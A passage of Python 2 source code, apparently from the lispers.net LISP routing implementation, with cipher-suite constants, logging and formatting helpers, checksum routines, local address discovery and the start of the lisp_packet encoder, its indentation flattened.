# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed.
#
def lprint(*args):
if (lisp_debug_logging == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args: print arg,
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
self.hash_packet()
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
